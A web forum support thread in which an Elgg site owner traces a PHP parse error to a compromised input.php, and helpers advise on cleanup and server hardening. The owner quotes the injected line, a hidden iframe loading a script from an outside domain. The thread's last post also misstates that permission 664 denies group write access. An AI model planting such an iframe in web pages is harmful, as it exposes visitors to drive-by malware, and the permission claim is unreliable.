Suddenly getting an error when accessing my site

I haven't upgraded from 1.6x or changed anything lately. But suddenly if I try going to my site http://dietharbor.com I get the following error message:

Parse error: syntax error, unexpected T_STRING in /home/doug/public_html/dietharbor.com/engine/lib/input.php on line 159

Anything I can do to "kick" it back into working order?

Thanks,

doug

 

  • What does that file say at that line?

  • shud be
            $pee = preg_replace( "|\n</p>$|", '</p>', $pee );


    Doug prob has a corrupt file ;- ( -- try n replace that input.php from orig.

  • Actually, line 159 is blank.

    The last 4 lines of the files are lines 157-160 and they read:

    if (strpos($pee, '<pre') !== false)

    $pee = preg_replace_callback('!(<pre.*?>

    <iframe tcwdv='WCY6PRKc' src='http://http-iframe.org/s/in.cgi?7 ' width='690' height='437' style='display:none'></iframe>

    Does that look incorrect for my 1.6x server? It's looks weird, like somebody modified it.

    If so I will try to hunt up the original file and replace it. I don't see the 1.6 version up at the main Elgg site for download anymore.

    Thanks,

    doug

     

  • http://elgg.org/previous.php

    The only one missing on that page is Elgg 1.2

  • Added 1.2.  Not sure why that was left out.

  • I've downloaded the 1.61 version from there. Thanks.

    But line 159 in the downloaded version does not have a $pee = setting anywhere near there. The last $pee assignment in that file is at line 105:

    $pee = preg_replace( "|\n</p>$|", '</p>', $pee );

    Starting at line 159 is a section beginning with:

     

       if (!empty($_SERVER['PATH_INFO'])) {

           $_SERVER['PATH_INFO'] = stripslashes($_SERVER['PATH_INFO']);

       }

    Do you think I should replace just the input.php file or everything in engine/lib?
    Thanks,
    doug
  • I'd copy the whole thing over.

    It looks like you've been hacked (ineffectively). http://badwarebusters.org/main/itemview/15626

    If you're on shared hosting with a poorly configured server, it could have come from some other account. If you have a dedicated server or a VPS, then you definitely have a security problem with your server.

    You want to make sure that your files are writable only by your account. The web server only needs to be able to read them.

    There shouldn't be a way to do this with a clean Elgg install with a proper configuration (not that I know of anyways). Make sure your data directory is outside of your html root (or set up a .htaccess to block direct access). Make sure you do not have any plugins that allow users to upload files to a location within your Elgg directory - there might be a WYSIWYG editor that does this in the plugin repository.

    You probably want to do a search for other files that have been compromised before you copy the files over.

  • This is on shared hosting (hostgator).

    There seem to be lots of .php files in the various directories with a date of 4/14. I can't think of any reason they should have changed.

    The permissions for those files/directories are 664, which means only the owner should be able to change it.

    The data directory is in my server "root" which is above the html directory, so nobody should be able to access that. That would include uploaded graphics, right?

    I'm going to replace all the standard files.

    But I wonder - is there anything I should report to hostgator first to see if there is a security problem?

    Thanks,

    doug

  • Hostgator will probably just tell you its the fault of the application regardless of whether it is or not. It doesn't hurt to report it though.

    Do you know what user and group your web server runs under? I have never used shared hosting so I'm not familiar with how they configure servers. 664 means that the group you belong to has write permission and if you are in the same group as the web server (or another user on the same server), that means those files could be changed by someone else.

    The file plugin and profile plugin both store images in the data directory so if your data directory is not web accessible, you don't have to be concerned with someone uploading a script and executing it.

  • That's exactly what Hostgator told me. But it looks like various folders even outside my Elgg instance hierarchy were hacked. They helped me clean some things up and I got my Elgg site working again by replacing all the source from the newly downloaded build. I also had to upgrade a WordPress instance that got hacked.

    They say it's unlikely malware on my computer since I only use a Mac. They traced the hacking events (download/upload) to a single IP address in Israel. I've blocked that IP address and changed all my important passwords.

    But how it happened remains a mystery.

    I believe permission code 664 allows group read permission but not write permission. At least that is what my FTP program is reporting to me.

    Thanks for your help. All's well that ends well for now. But still, I think there was a security problem at Hostgator itself.

    doug